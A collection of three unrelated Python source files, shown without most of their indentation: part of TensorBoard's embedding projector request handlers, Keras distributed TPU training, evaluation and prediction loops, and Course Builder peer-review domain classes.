for (run, logdir) in run_path_pairs:
assets = plugin_asset_util.ListAssets(logdir, plugin_assets_name)
if metadata.PROJECTOR_FILENAME not in assets:
continue
assets_dir = os.path.join(
self._run_paths[run], metadata.PLUGINS_DIR, plugin_assets_name
)
assets_path_pair = (run, os.path.abspath(assets_dir))
extra.append(assets_path_pair)
run_path_pairs.extend(extra)
@wrappers.Request.application
def _serve_file(self, file_path, request):
"""Returns a resource file."""
res_path = os.path.join(os.path.dirname(__file__), file_path)
with open(res_path, "rb") as read_file:
mimetype = mimetypes.guess_type(file_path)[0]
return Respond(request, read_file.read(), content_type=mimetype)
@wrappers.Request.application
def _serve_runs(self, request):
"""Returns a list of runs that have embeddings."""
self._update_configs()
return Respond(request, list(self._configs.keys()), "application/json")
@wrappers.Request.application
def _serve_config(self, request):
run = request.args.get("run")
if run is None:
return Respond(
request, 'query parameter "run" is required', "text/plain", 400
)
self._update_configs()
config = self._configs.get(run)
if config is None:
return Respond(
request, 'Unknown run: "%s"' % run, "text/plain", 400
)
return Respond(
request, json_format.MessageToJson(config), "application/json"
)
@wrappers.Request.application
def _serve_metadata(self, request):
run = request.args.get("run")
if run is None:
return Respond(
request, 'query parameter "run" is required', "text/plain", 400
)
name = request.args.get("name")
if name is None:
return Respond(
request, 'query parameter "name" is required', "text/plain", 400
)
num_rows = _parse_positive_int_param(request, "num_rows")
if num_rows == -1:
return Respond(
request,
"query parameter num_rows must be integer > 0",
"text/plain",
400,
)
self._update_configs()
config = self._configs.get(run)
if config is None:
return Respond(
request, 'Unknown run: "%s"' % run, "text/plain", 400
)
fpath = self._get_metadata_file_for_tensor(name, config)
if not fpath:
return Respond(
request,
'No metadata file found for tensor "%s" in the config file "%s"'
% (name, self.config_fpaths[run]),
"text/plain",
400,
)
fpath = _rel_to_abs_asset_path(fpath, self.config_fpaths[run])
if not tf.io.gfile.exists(fpath) or tf.io.gfile.isdir(fpath):
return Respond(
request,
'"%s" not found, or is not a file' % fpath,
"text/plain",
400,
)
num_header_rows = 0
with tf.io.gfile.GFile(fpath, "r") as f:
lines = []
# Stream reading the file with early break in case the file doesn't fit in
# memory.
for line in f:
lines.append(line)
if len(lines) == 1 and "\t" in lines[0]:
num_header_rows = 1
if num_rows and len(lines) >= num_rows + num_header_rows:
break
return Respond(request, "".join(lines), "text/plain")
@wrappers.Request.application
def _serve_tensor(self, request):
run = request.args.get("run")
if run is None:
return Respond(
request, 'query parameter "run" is required', "text/plain", 400
)
name = request.args.get("name")
if name is None:
return Respond(
request, 'query parameter "name" is required', "text/plain", 400
)
num_rows = _parse_positive_int_param(request, "num_rows")
if num_rows == -1:
return Respond(
request,
"query parameter num_rows must be integer > 0",
"text/plain",
400,
)
self._update_configs()
config = self._configs.get(run)
if config is None:
return Respond(
request, 'Unknown run: "%s"' % run, "text/plain", 400
)
tensor = self.tensor_cache.get((run, name))
if tensor is None:
# See if there is a tensor file in the config.
embedding = self._get_embedding(name, config)
if embedding and embedding.tensor_path:
fpath = _rel_to_abs_asset_path(
embedding.tensor_path, self.config_fpaths[run]
)
if not tf.io.gfile.exists(fpath):
return Respond(
request,
'Tensor file "%s" does not exist' % fpath,
"text/plain",
400,
)
try:
tensor = _read_tensor_tsv_file(fpath)
except UnicodeDecodeError:
tensor = _read_tensor_binary_file(
fpath, embedding.tensor_shape
)
else:
reader = self._get_reader_for_run(run)
if not reader or not reader.has_tensor(name):
return Respond(
request,
'Tensor "%s" not found in checkpoint dir "%s"'
% (name, config.model_checkpoint_path),
"text/plain",
400,
)
try:
tensor = reader.get_tensor(name)
except tf.errors.InvalidArgumentError as e:
return Respond(request, str(e), "text/plain", 400)
self.tensor_cache.set((run, name), tensor)
if num_rows:
tensor = tensor[:num_rows]
if tensor.dtype != "float32":
tensor = tensor.astype(dtype="float32", copy=False)
data_bytes = tensor.tobytes()
return Respond(request, data_bytes, "application/octet-stream")
@wrappers.Request.application
def _serve_bookmarks(self, request):
run = request.args.get("run")
if not run:
return Respond(
request, 'query parameter "run" is required', "text/plain", 400
)
name = request.args.get("name")
if name is None:
return Respond(
request, 'query parameter "name" is required', "text/plain", 400
)
self._update_configs()
config = self._configs.get(run)
if config is None:
return Respond(
request, 'Unknown run: "%s"' % run, "text/plain", 400
)
fpath = self._get_bookmarks_file_for_tensor(name, config)
if not fpath:
return Respond(
request,
'No bookmarks file found for tensor "%s" in the config file "%s"'
% (name, self.config_fpaths[run]),
"text/plain",
400,
)
fpath = _rel_to_abs_asset_path(fpath, self.config_fpaths[run])
if not tf.io.gfile.exists(fpath) or tf.io.gfile.isdir(fpath):
return Respond(
request,
'"%s" not found, or is not a file' % fpath,
"text/plain",
400,
)
bookmarks_json = None
with tf.io.gfile.GFile(fpath, "rb") as f:
bookmarks_json = f.read()
return Respond(request, bookmarks_json, "application/json")
@wrappers.Request.application
def _serve_sprite_image(self, request):
run = request.args.get("run")
if not run:
return Respond(
request, 'query parameter "run" is required', "text/plain", 400
)
name = request.args.get("name")
if name is None:
return Respond(
request, 'query parameter "name" is required', "text/plain", 400
)
self._update_configs()
config = self._configs.get(run)
if config is None:
return Respond(
request, 'Unknown run: "%s"' % run, "text/plain", 400
)
embedding_info = self._get_embedding(name, config)
if not embedding_info or not embedding_info.sprite.image_path:
return Respond(
request,
'No sprite image file found for tensor "%s" in the config file "%s"'
% (name, self.config_fpaths[run]),
"text/plain",
400,
)
fpath = os.path.expanduser(embedding_info.sprite.image_path)
fpath = _rel_to_abs_asset_path(fpath, self.config_fpaths[run])
if not tf.io.gfile.exists(fpath) or tf.io.gfile.isdir(fpath):
return Respond(
request,
'"%s" does not exist or is directory' % fpath,
"text/plain",
400,
)
f = tf.io.gfile.GFile(fpath, "rb")
encoded_image_string = f.read()
f.close()
image_type = imghdr.what(None, encoded_image_string)
mime_type = _IMGHDR_TO_MIMETYPE.get(image_type, _DEFAULT_IMAGE_MIMETYPE)
return Respond(request, encoded_image_string, mime_type)
def _find_latest_checkpoint(dir_path):
if not _using_tf():
return None
try:
ckpt_path = tf.train.latest_checkpoint(dir_path)
if not ckpt_path:
# Check the parent directory.
ckpt_path = tf.train.latest_checkpoint(
os.path.join(dir_path, os.pardir)
)
return ckpt_path
except tf.errors.NotFoundError:
return None
|
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Part of the Keras training engine related to distributed training.
"""
# pylint: disable=protected-access
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import enum
import numpy as np
from tensorflow.python.distribute import reduce_util as ds_reduce_util
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import tensor_shape
from tensorflow.python.keras import backend as K
from tensorflow.python.keras import callbacks as cbks
from tensorflow.python.keras import metrics as metrics_module
from tensorflow.python.keras import optimizers
from tensorflow.python.keras.engine import distributed_training_utils
from tensorflow.python.keras.utils.generic_utils import Progbar
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import distribute as distribute_lib
from tensorflow.python.util import nest
# TODO(sourabhbajaj): Check if we can merge the test and prediction graphs
class _Mode(enum.Enum):
TRAIN = 'train'
TEST = 'test'
PREDICT = 'predict'
# TODO(priyag, sourabhbajaj): Refactor this file to address code duplication.
def experimental_fit_loop(model,
iterator,
epochs=100,
verbose=1,
callbacks=None,
initial_epoch=0,
steps_per_epoch=None,
val_iterator=None,
validation_steps=None):
"""Fit loop for training with TPU DistributionStrategy.
Arguments:
model: Keras Model instance.
iterator: Iterator that returns inputs and targets
epochs: Number of times to iterate over the data
verbose: Integer, Verbosity mode, 0, 1 or 2
callbacks: List of callbacks to be called during training
initial_epoch: Epoch at which to start training
(useful for resuming a previous training run)
steps_per_epoch: Total number of steps (batches of samples)
before declaring one epoch finished and starting the
next epoch. Ignored with the default value of `None`.
val_iterator: Iterator for validation data.
validation_steps: Number of steps to run validation for
(only if doing validation from data tensors).
Ignored with the default value of `None`.
Returns:
Returns `None`.
Raises:
ValueError: in case of invalid arguments.
"""
current_strategy = model._distribution_strategy
K.get_session().run(current_strategy.initialize())
def _per_device_fit_function(model):
model._make_fit_function()
return (model._fit_function.inputs, model._fit_function.outputs,
model._fit_function.updates_op, model._fit_function.session_kwargs)
# TODO(priyag, sourabhbajaj): This should likely not be hardcoded here.
K.set_learning_phase(1)
out_labels = model.metrics_names or []
def step_fn(ctx, inputs):
"""Clones the model and calls make_fit_function."""
# TODO(priyag, sourabhbajaj): The model gets cloned every time
# fit/test/predict is called. We should look into caching this keyed on
# input shapes.
inputs, targets = inputs
clone_model_on_replicas(
model,
current_strategy,
make_callback_model=True,
inputs=inputs,
targets=targets,
mode=_Mode.TRAIN)
(grouped_inputs, grouped_outputs, grouped_updates,
grouped_session_args) = current_strategy.call_for_each_replica(
_per_device_fit_function, args=(model._grouped_model_train,))
(all_inputs, all_outputs, all_updates,
all_session_args) = distributed_training_utils.unwrap_values(
current_strategy, grouped_inputs, grouped_outputs,
grouped_updates, grouped_session_args)
combined_fn = K.function(
all_inputs,
all_outputs,
updates=all_updates,
name='distributed_fit_function',
**all_session_args)
for label, output in zip(out_labels, combined_fn.outputs):
if label == 'loss':
reduce_op = distribute_lib.get_loss_reduction()
else:
        # We reduce all other metrics using mean for now. This is a temporary
        # workaround until new metrics are in place.
reduce_op = ds_reduce_util.ReduceOp.MEAN
ctx.set_last_step_output(label, output, reduce_op)
# TODO(priyag, sourabhbajaj): Ignoring these things from the combined_fn:
# feed_dict, session kwargs, run options, run_metadata for now. These should
# be handled appropriately
return combined_fn.updates_op
# Add initial dummy values for loss and other metric tensors.
initial_loop_values = {}
initial_loop_values['loss'] = constant_op.constant(1e7)
for name in model.metrics_names[1:]:
tensor = model._all_stateful_metrics_tensors[name]
initial_loop_values[name] = array_ops.zeros(tensor.shape, tensor.dtype)
if steps_per_epoch is None:
raise ValueError('`steps_per_epoch` should be specified when calling '
'`fit` on the model.')
steps_per_run = K.variable(
value=min(steps_per_epoch, current_strategy.extended.steps_per_run),
dtype='int32',
name='steps_per_run')
with current_strategy.scope():
ctx = current_strategy.run_steps_on_dataset(
step_fn, iterator, iterations=steps_per_run,
initial_loop_values=initial_loop_values)
train_op = ctx.run_op
output_tensors = ctx.last_step_outputs
do_validation = bool(validation_steps)
# Copy the weights from the original model to each of the replicated models.
orig_model_weights = model.get_weights()
with current_strategy.scope():
distributed_model = current_strategy.unwrap(model._grouped_model_train)[0]
distributed_training_utils.set_weights(
current_strategy, distributed_model, orig_model_weights)
callbacks = cbks.configure_callbacks(
callbacks,
model,
do_validation=do_validation,
val_inputs=None,
val_targets=None,
epochs=epochs,
steps_per_epoch=steps_per_epoch,
verbose=verbose)
# Calculate the steps each time on the device.
steps_to_run = [current_strategy.extended.steps_per_run] * (
steps_per_epoch // current_strategy.extended.steps_per_run)
if steps_per_epoch % current_strategy.extended.steps_per_run:
steps_to_run.append(
steps_per_epoch % current_strategy.extended.steps_per_run)
callbacks.on_train_begin()
for epoch in range(initial_epoch, epochs):
callbacks.on_epoch_begin(epoch)
epoch_logs = {}
step_index = 0
prev_step_count = None
for step_count in steps_to_run:
batch_logs = {'batch': step_index, 'size': 1, 'num_steps': step_count}
callbacks.on_batch_begin(step_index, batch_logs)
if prev_step_count is None or step_count != prev_step_count:
steps_per_run.load(step_count, K.get_session())
prev_step_count = step_count
try:
_, outputs = K.get_session().run([train_op, output_tensors])
except errors.OutOfRangeError:
logging.warning('Your dataset iterator ran out of data; '
'interrupting training. Make sure that your dataset '
'can generate at least `steps_per_epoch * epochs` '
'batches (in this case, %d batches).' %
                        (steps_per_epoch * epochs))
break
batch_logs.update(outputs)
callbacks.on_batch_end(step_index, batch_logs)
step_index = step_index + step_count
if callbacks.model.stop_training:
break
if do_validation:
logging.info('Running validation at fit epoch: %s', epoch)
# Since we create a new clone from the original model we need to copy
# the weights back to the original model before we can run validation.
with current_strategy.scope():
updated_weights = current_strategy.unwrap(
model._grouped_model_train)[0].get_weights()
model.set_weights(updated_weights)
val_outs = experimental_test_loop( # pylint: disable=undefined-variable
model,
val_iterator,
steps=validation_steps,
verbose=verbose,
initialize_finalize_strategy=False)
if not isinstance(val_outs, list):
val_outs = [val_outs]
# Same labels assumed.
for label, val_out in zip(out_labels, val_outs):
epoch_logs['val_' + label] = val_out
callbacks.on_epoch_end(epoch, epoch_logs)
if callbacks.model.stop_training:
break
callbacks.on_train_end()
# Copy the weights back from the replicated model to the original model.
with current_strategy.scope():
updated_weights = current_strategy.unwrap(
model._grouped_model_train)[0].get_weights()
model.set_weights(updated_weights)
K.get_session().run(current_strategy.finalize())
return model.history
def experimental_test_loop(model,
iterator,
verbose=0,
steps=None,
initialize_finalize_strategy=True):
"""Test loop for evaluating with TPU DistributionStrategy.
Arguments:
model: Keras Model instance.
iterator: Iterator for input data.
verbose: Integer, Verbosity mode 0 or 1.
steps: Total number of steps (batches of samples)
before declaring predictions finished.
Ignored with the default value of `None`.
    initialize_finalize_strategy: Whether the strategy's initialize and
      finalize functions should be called.
Returns:
Scalar loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the outputs.
"""
current_strategy = model._distribution_strategy
if initialize_finalize_strategy:
K.get_session().run(current_strategy.initialize())
def _per_device_eval_function(model):
model._make_eval_function()
return (model._eval_function.inputs, model._eval_function.outputs,
model._eval_function.updates_op,
model._eval_function.session_kwargs)
# TODO(priyag, sourabhbajaj): This should likely not be hardcoded here.
K.set_learning_phase(0)
def step_fn(ctx, inputs):
"""Clones the model and calls make_eval_function."""
# TODO(priyag, sourabhbajaj): The model gets cloned every time
# fit/test/predict is called. We should look into caching this keyed on
# input shapes.
inputs, targets = inputs
clone_model_on_replicas(
model,
current_strategy,
make_callback_model=False,
inputs=inputs,
targets=targets,
mode=_Mode.TEST)
(grouped_inputs, grouped_outputs, grouped_updates,
grouped_session_args) = current_strategy.call_for_each_replica(
_per_device_eval_function, args=(model._grouped_model_test,))
(all_inputs, all_outputs, all_updates,
all_session_args) = distributed_training_utils.unwrap_values(
current_strategy, grouped_inputs, grouped_outputs, grouped_updates,
grouped_session_args)
combined_fn = K.function(
all_inputs, all_outputs,
updates=all_updates,
name='distributed_test_function',
**all_session_args)
for label, output in zip(model.metrics_names, combined_fn.outputs):
if label == 'loss':
reduce_op = distribute_lib.get_loss_reduction()
else:
        # We reduce all other metrics using mean for now. This is a temporary
        # workaround until new metrics are in place.
reduce_op = ds_reduce_util.ReduceOp.MEAN
ctx.set_last_step_output(label, output, reduce_op)
return combined_fn.updates_op
# Add initial dummy values for loss and other metric tensors.
initial_loop_values = {}
initial_loop_values['loss'] = constant_op.constant(1e7)
for name in model.metrics_names[1:]:
tensor = model._all_stateful_metrics_tensors[name]
initial_loop_values[name] = array_ops.zeros(tensor.shape, tensor.dtype)
with current_strategy.scope():
# TODO(priyag): Use steps_per_run when we use new metrics as they will
# allow handling metric computation at each step using variables.
ctx = current_strategy.run_steps_on_dataset(
step_fn, iterator, iterations=1,
initial_loop_values=initial_loop_values)
test_op = ctx.run_op
output_tensors = ctx.last_step_outputs
  if verbose >= 1:
progbar = Progbar(target=steps)
# Copy the weights from the original model to each of the replicated models.
orig_model_weights = model.get_weights()
with current_strategy.scope():
distributed_model = current_strategy.unwrap(model._grouped_model_test)[0]
distributed_training_utils.set_weights(
current_strategy, distributed_model, orig_model_weights)
assert steps is not None
outs = [0.] * len(model.metrics_names)
for step in range(steps):
_, batch_outs = K.get_session().run([test_op, output_tensors])
for i, label in enumerate(model.metrics_names):
outs[i] += batch_outs[label]
if verbose >= 1:
progbar.update(step + 1)
for i in range(len(outs)):
outs[i] /= (steps)
if initialize_finalize_strategy:
K.get_session().run(current_strategy.finalize())
if len(outs) == 1:
return outs[0]
return outs
def experimental_predict_loop(model, iterator, verbose=0, steps=None):
"""Predict loop for predicting with TPU DistributionStrategy.
Arguments:
model: Keras Model instance.
iterator: Iterator for input data.
verbose: Integer, Verbosity mode 0 or 1.
steps: Total number of steps (batches of samples)
before declaring `_predict_loop` finished.
Ignored with the default value of `None`.
Returns:
Array of predictions (if the model has a single output)
or list of arrays of predictions
(if the model has multiple outputs).
"""
current_strategy = model._distribution_strategy
K.get_session().run(current_strategy.initialize())
# TODO(priyag, sourabhbajaj): This should likely not be hardcoded here.
K.set_learning_phase(0)
def _per_device_predict_function(model):
model._make_predict_function()
return (model.predict_function.inputs,
model.predict_function.outputs,
model.predict_function.updates_op,
model.predict_function.session_kwargs)
def step_fn(ctx, inputs):
"""Clones the model and calls make_predict_function."""
# TODO(priyag, sourabhbajaj): The model gets cloned every time
# fit/test/predict is called. We should look into caching this keyed on
# input shapes.
clone_model_on_replicas(
model,
current_strategy,
make_callback_model=False,
inputs=inputs,
mode=_Mode.PREDICT)
(grouped_inputs, grouped_outputs, grouped_updates,
grouped_session_args) = current_strategy.call_for_each_replica(
_per_device_predict_function, args=(model._grouped_model_predict,))
(all_inputs, all_outputs, all_updates,
all_session_args) = distributed_training_utils.unwrap_values(
current_strategy, grouped_inputs, grouped_outputs, grouped_updates,
grouped_session_args)
combined_fn = K.function(
all_inputs, all_outputs,
updates=all_updates,
name='distributed_predict_function',
**all_session_args)
for label, output in zip(model.output_names, combined_fn.outputs):
ctx.set_last_step_output(label, output)
return combined_fn.updates_op
# Add initial dummy values for outputs.
initial_loop_values = {}
batch_dimension = distributed_training_utils.get_batch_dimension(iterator)
for name, tensor in zip(model.output_names, model.outputs):
# TODO(priyag): This is a workaround as we do not know the batch dimension
# of the model's output at this point.
shape = tensor_shape.TensorShape(tensor.shape.dims)
shape.dims = [batch_dimension] + shape.dims[1:]
initial_loop_values[name] = array_ops.zeros(shape, tensor.dtype)
with current_strategy.scope():
# TODO(priyag, sourabhbajaj): Support steps_per_run if/when we add outfeed.
ctx = current_strategy.run_steps_on_dataset(
step_fn, iterator, iterations=1,
initial_loop_values=initial_loop_values)
predict_op = ctx.run_op
output_tensors = ctx.last_step_outputs
  if verbose >= 1:
progbar = Progbar(target=steps)
# Copy the weights from the original model to each of the replicated models.
orig_model_weights = model.get_weights()
with current_strategy.scope():
distributed_model = current_strategy.unwrap(model._grouped_model_predict)[0]
distributed_training_utils.set_weights(
current_strategy, distributed_model, orig_model_weights)
assert steps is not None
# Since we do not know how many samples we will see, we cannot pre-allocate
# the returned Numpy arrays. Instead, we store one array per batch seen
# and concatenate them upon returning.
unconcatenated_outs = [[] for _ in model.outputs]
for step in range(steps):
_, batch_outs = K.get_session().run([predict_op, output_tensors])
# TODO(priyag): maybe need to unwrap the outputs first for MirroredStrategy.
for i, label in enumerate(model.output_names):
unconcatenated_outs[i].extend(batch_outs[label])
if verbose >= 1:
progbar.update(step + 1)
K.get_session().run(current_strategy.finalize())
if len(unconcatenated_outs) == 1:
return np.concatenate(unconcatenated_outs[0], axis=0)
return [
np.concatenate(unconcatenated_outs[i], axis=0)
for i in range(len(unconcatenated_outs))
]
def _clone_and_build_model(model, inputs=None, targets=None):
"""Clone and build the given keras_model."""
  # We import here because a module-level import causes a circular dependency
  # error.
from tensorflow.python.keras import models # pylint: disable=g-import-not-at-top
cloned_model = models.clone_model(model, input_tensors=inputs)
# Compile and build model.
if isinstance(model.optimizer, optimizers.TFOptimizer):
optimizer = model.optimizer
else:
optimizer_config = model.optimizer.get_config()
optimizer = model.optimizer.__class__.from_config(optimizer_config)
  # Recast all low-precision outputs back to float32 since we only cast the
  # inputs to bfloat16 and not the targets. This preserves precision when
  # calculating the loss value.
def _upcast_low_precision_outputs(output):
if output.dtype == dtypes.bfloat16:
return math_ops.cast(output, dtypes.float32)
else:
return output
cloned_model.outputs = [_upcast_low_precision_outputs(o)
for o in cloned_model.outputs]
if isinstance(targets, tuple):
targets = nest.flatten(targets)
cloned_model.compile(
optimizer,
model.loss,
metrics=metrics_module.clone_metrics(model._compile_metrics),
loss_weights=model.loss_weights,
sample_weight_mode=model.sample_weight_mode,
weighted_metrics=metrics_module.clone_metrics(
model._compile_weighted_metrics),
target_tensors=targets)
return cloned_model
def clone_model_on_replicas(model, strategy, make_callback_model=False,
inputs=None, targets=None, mode=None):
"""Create a cloned model on each replica."""
with strategy.scope():
grouped_model = strategy.call_for_each_replica(
_clone_and_build_model, args=(model, inputs, targets))
if mode is _Mode.TRAIN:
model._grouped_model_train = grouped_model
elif mode is _Mode.TEST:
model._grouped_model_test = grouped_model
elif mode is _Mode.PREDICT:
model._grouped_model_predict = grouped_model
else:
model._grouped_model = grouped_model
if make_callback_model:
model._make_callback_model(grouped_model)
def _get_input_from_iterator(iterator, model):
"""Get elements from the iterator and verify the input shape and type."""
next_element = iterator.get_next()
if len(nest.flatten(next_element)) == len(model.inputs):
x = next_element
y = None
sample_weights = None
elif len(nest.flatten(next_element)) == (len(model.inputs) +
len(model.outputs)):
x, y = next_element
sample_weights = None
else:
x, y, sample_weights = next_element
# Validate that all the elements in x and y are of the same type and shape.
# We can then pass the first element of x and y to `_standardize_weights`
# below and be confident of the output.
x_values, y_values, sample_weights_values = distributed_training_utils.\
validate_distributed_dataset_inputs(model._distribution_strategy, x, y,
sample_weights)
model._standardize_weights(x_values, y_values,
sample_weight=sample_weights_values)
return x, y, sample_weights
def _get_execution_function(model, mode):
"""Get function to run one step of distributed model execution."""
strategy = model._distribution_strategy
if not model._grouped_model:
clone_model_on_replicas(
model, strategy, make_callback_model=(mode == 'train'))
def _per_device_function(model):
f = model._get_execution_function(mode)
return (f.inputs, f.outputs, f.updates_op, f.session_kwargs)
with strategy.scope():
# Create train ops on each of the devices when we call
# `_per_device_fit_function`.
(grouped_inputs, grouped_outputs, grouped_updates,
grouped_session_args) = strategy.call_for_each_replica(
_per_device_function, args=(model._grouped_model,))
if mode == 'train':
# Initialize the variables in the replicated model. This is necessary for
# multi-worker training because on some workers, initialization is not
# needed. This method does initialization or waiting for initialization
# according to the context object of distribute coordinator.
distributed_training_utils.init_restore_or_wait_for_variables()
# Unwrap all the per device values returned from `call_for_each_replica`.
# Unwrapping per device values gives you a list of values that can be
# used to construct a new train function that is composed of update ops on
# all the devices over which the model is distributed.
(all_inputs, all_outputs, all_updates,
all_session_args) = distributed_training_utils.unwrap_values(
strategy,
grouped_inputs,
grouped_outputs,
grouped_updates,
grouped_session_args,
with_loss_tensor=(mode != 'predict'))
return K.function(
all_inputs,
all_outputs,
updates=all_updates,
name='distributed_{}_function'.format(mode),
**all_session_args)
def _prepare_feed_values(model, inputs, targets, sample_weights, mode):
"""Prepare feed values to the model execution function.
Arguments:
model: Model to prepare feed values for.
inputs: List or dict of model inputs.
targets: Optional list of model targets.
sample_weights: Optional list of sample weight arrays.
mode: One of 'train'/'test'/'predict'.
Returns:
Feed values for the model in the given mode.
"""
strategy = model._distribution_strategy
inputs, targets, sample_weights = _get_input_from_iterator(inputs, model)
inputs = distributed_training_utils.flatten_perdevice_values(strategy, inputs)
targets = distributed_training_utils.flatten_perdevice_values(
strategy, targets)
if mode == 'predict':
sample_weights = []
targets = []
else:
sample_weights = [
None for _ in range(len(model.outputs) * strategy.num_replicas_in_sync)
]
ins = inputs + targets + sample_weights
if mode == 'train' and not isinstance(K.learning_phase(), int):
ins += [True]
return ins
def _copy_weights_to_distributed_model(model):
"""Copies weights from original model to distributed models."""
if model._distribution_strategy:
# Copy the weights from the original model to each of the replicated models.
orig_model_weights = model.get_weights()
distributed_model = model._distribution_strategy.unwrap(
model._grouped_model)[0]
distributed_training_utils.set_weights(
model._distribution_strategy, distributed_model, orig_model_weights)
def _copy_weights_to_original_model(model, mode):
"""Copies weights from first distributed model back to original model."""
if model._distribution_strategy and mode == 'train':
updated_weights = model._distribution_strategy.unwrap(
model._grouped_model)[0].get_weights()
model.set_weights(updated_weights)
def _per_device_aggregate_batch(batch_outs, model, mode):
"""Aggregates the per-device batch-level outputs from a distributed step."""
if model._distribution_strategy is not None and mode == 'predict':
total_batch_outs = []
for i in range(len(model.outputs)):
num_replicas = model._distribution_strategy.num_replicas_in_sync
nested_outs = batch_outs[i * num_replicas:i * num_replicas + num_replicas]
total_batch_outs.append(np.concatenate(nest.flatten(nested_outs)))
return total_batch_outs
return batch_outs
def should_run_experimental_loop(model):
"""Whether to run the experimental loops in this file."""
return (hasattr(model, '_distribution_strategy') and
model._distribution_strategy.__class__.__name__ == 'TPUStrategy')
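# Hedged sketch of how a caller might dispatch to the loops in this file;
# `model` and `dataset_iterator` are placeholders, and this helper is not part
# of the Keras training engine itself.
def _example_dispatch_to_experimental_loops(model, dataset_iterator, epochs,
                                            steps_per_epoch):
  if should_run_experimental_loop(model):
    return experimental_fit_loop(model, dataset_iterator, epochs=epochs,
                                 steps_per_epoch=steps_per_epoch)
  raise NotImplementedError('Fall back to the regular Keras fit loop here.')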
|
|
# Copyright 2013 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Domain objects and constants for use by internal and external clients."""
__author__ = [
'[email protected] (John Cox)',
]
# Identifier for reviews that have been computer-assigned.
ASSIGNER_KIND_AUTO = 'AUTO'
# Identifier for reviews that have been assigned by a human.
ASSIGNER_KIND_HUMAN = 'HUMAN'
ASSIGNER_KINDS = (
ASSIGNER_KIND_AUTO,
ASSIGNER_KIND_HUMAN,
)
# Maximum number of ReviewSteps with removed = False, in any REVIEW_STATE, that
# can exist in the backend at a given time.
MAX_UNREMOVED_REVIEW_STEPS = 100
# State of a review that is currently assigned, either by a human or by machine.
REVIEW_STATE_ASSIGNED = 'ASSIGNED'
# State of a review that is complete and may be shown to the reviewee, provided
# the reviewee is eligible to see their reviews.
REVIEW_STATE_COMPLETED = 'COMPLETED'
# State of a review that used to be assigned but the assignment has been
# expired. Only machine-assigned reviews can be expired.
REVIEW_STATE_EXPIRED = 'EXPIRED'
REVIEW_STATES = (
REVIEW_STATE_ASSIGNED,
REVIEW_STATE_COMPLETED,
REVIEW_STATE_EXPIRED,
)
class Error(Exception):
"""Base error class."""
class ConstraintError(Error):
"""Raised when data is found indicating a constraint is violated."""
class NotAssignableError(Error):
"""Raised when review assignment is requested but cannot be satisfied."""
class RemovedError(Error):
"""Raised when an op cannot be performed on a step because it is removed."""
def __init__(self, message, value):
"""Constructs a new RemovedError."""
super(RemovedError, self).__init__(message)
self.value = value
def __str__(self):
return '%s: removed is %s' % (self.message, self.value)
class ReviewProcessAlreadyStartedError(Error):
"""Raised when someone attempts to start a review process in progress."""
class TransitionError(Error):
"""Raised when an invalid state transition is attempted."""
def __init__(self, message, before, after):
"""Constructs a new TransitionError.
Args:
message: string. Exception message.
before: string in peer.ReviewStates (though this is unenforced).
State we attempted to transition from.
after: string in peer.ReviewStates (though this is unenforced).
State we attempted to transition to.
"""
super(TransitionError, self).__init__(message)
self.after = after
self.before = before
def __str__(self):
return '%s: attempted to transition from %s to %s' % (
self.message, self.before, self.after)
class Review(object):
"""Domain object for a student work submission."""
def __init__(self, contents=None, key=None):
self._contents = contents
self._key = key
@property
def contents(self):
return self._contents
@property
def key(self):
return self._key
class ReviewStep(object):
"""Domain object for the status of a single review at a point in time."""
def __init__(
self, assigner_kind=None, change_date=None, create_date=None, key=None,
removed=None, review_key=None, review_summary_key=None,
reviewee_key=None, reviewer_key=None, state=None, submission_key=None,
unit_id=None):
self._assigner_kind = assigner_kind
self._change_date = change_date
self._create_date = create_date
self._key = key
self._removed = removed
self._review_key = review_key
self._review_summary_key = review_summary_key
self._reviewee_key = reviewee_key
self._reviewer_key = reviewer_key
self._state = state
self._submission_key = submission_key
self._unit_id = unit_id
@property
def assigner_kind(self):
return self._assigner_kind
@property
def change_date(self):
return self._change_date
@property
def create_date(self):
return self._create_date
@property
def is_assigned(self):
"""Predicate for whether the step is in REVIEW_STATE_ASSIGNED."""
return self.state == REVIEW_STATE_ASSIGNED
@property
def is_completed(self):
"""Predicate for whether the step is in REVIEW_STATE_COMPLETED."""
return self.state == REVIEW_STATE_COMPLETED
@property
def is_expired(self):
"""Predicate for whether the step is in REVIEW_STATE_EXPIRED."""
return self.state == REVIEW_STATE_EXPIRED
@property
def key(self):
return self._key
@property
def removed(self):
return self._removed
@property
def review_key(self):
return self._review_key
@property
def review_summary_key(self):
return self._review_summary_key
@property
def reviewee_key(self):
return self._reviewee_key
@property
def reviewer_key(self):
return self._reviewer_key
@property
def state(self):
return self._state
@property
def submission_key(self):
return self._submission_key
@property
def unit_id(self):
return self._unit_id
class ReviewSummary(object):
"""Domain object for review state aggregate entities."""
def __init__(
self, assigned_count=None, completed_count=None, change_date=None,
create_date=None, key=None, reviewee_key=None, submission_key=None,
unit_id=None):
self._assigned_count = assigned_count
self._completed_count = completed_count
self._change_date = change_date
self._create_date = create_date
self._key = key
self._reviewee_key = reviewee_key
self._submission_key = submission_key
self._unit_id = unit_id
@property
def assigned_count(self):
return self._assigned_count
@property
def completed_count(self):
return self._completed_count
@property
def change_date(self):
return self._change_date
@property
def create_date(self):
return self._create_date
@property
def key(self):
return self._key
@property
def reviewee_key(self):
return self._reviewee_key
